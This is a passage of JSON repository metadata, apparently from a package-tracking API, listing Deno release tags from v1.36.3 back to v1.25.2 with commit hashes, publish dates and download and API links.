deno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1